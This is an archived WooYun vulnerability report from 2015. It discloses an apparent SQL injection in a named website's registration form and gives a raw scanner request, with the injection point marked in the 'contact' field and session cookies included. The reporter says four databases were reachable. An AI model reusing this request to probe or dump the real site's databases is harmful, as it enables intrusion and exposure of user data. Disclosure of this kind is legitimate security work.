乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-20: 细节已通知厂商并且等待厂商处理中 2015-12-25: 厂商已经主动忽略漏洞,细节向公众公开
不得不说这个主页做的真赞!
http://www.tuigirl.com/
POST /registration/add HTTP/1.1Content-Length: 1016Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_QBMOGLEVTIX-Requested-With: XMLHttpRequestReferer: http://www.tuigirl.com/Cookie: PHPSESSID=2m2dpus8515gcu88h4i6l7gvp0; Hm_lvt_535f51fa4bb9ec6b6c800f1103696519=1450521437,1450521492; Hm_lpvt_535f51fa4bb9ec6b6c800f1103696519=1450521492; HMACCOUNT=28092BFDE85A6D4CHost: www.tuigirl.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_RKLHIDBIJH-------AcunetixBoundary_RKLHIDBIJHContent-Disposition: form-data; name="sub"-------AcunetixBoundary_RKLHIDBIJHContent-Disposition: form-data; name="contact"1*-------AcunetixBoundary_RKLHIDBIJHContent-Disposition: form-data; name="specialty"1-------AcunetixBoundary_RKLHIDBIJHContent-Disposition: form-data; name="username"hrlvepgq-------AcunetixBoundary_RKLHIDBIJHContent-Disposition: form-data; name="weixin"1-------AcunetixBoundary_RKLHIDBIJHContent-Disposition: form-data; name="upfile"; filename="acunetix.txt"Content-Type: text/plain-------AcunetixBoundary_RKLHIDBIJHContent-Disposition: form-data; name="upfile1"; filename="acunetix.txt"Content-Type: text/plain-------AcunetixBoundary_RKLHIDBIJHContent-Disposition: form-data; name="upfile2"; filename="acunetix.txt"Content-Type: text/plain-------AcunetixBoundary_RKLHIDBIJH--
涉及4个数据库,跑起来有点卡,就不慢慢跑了~:
危害等级:无影响厂商忽略
忽略时间:2015-12-25 22:30
漏洞Rank:4 (WooYun评价)
暂无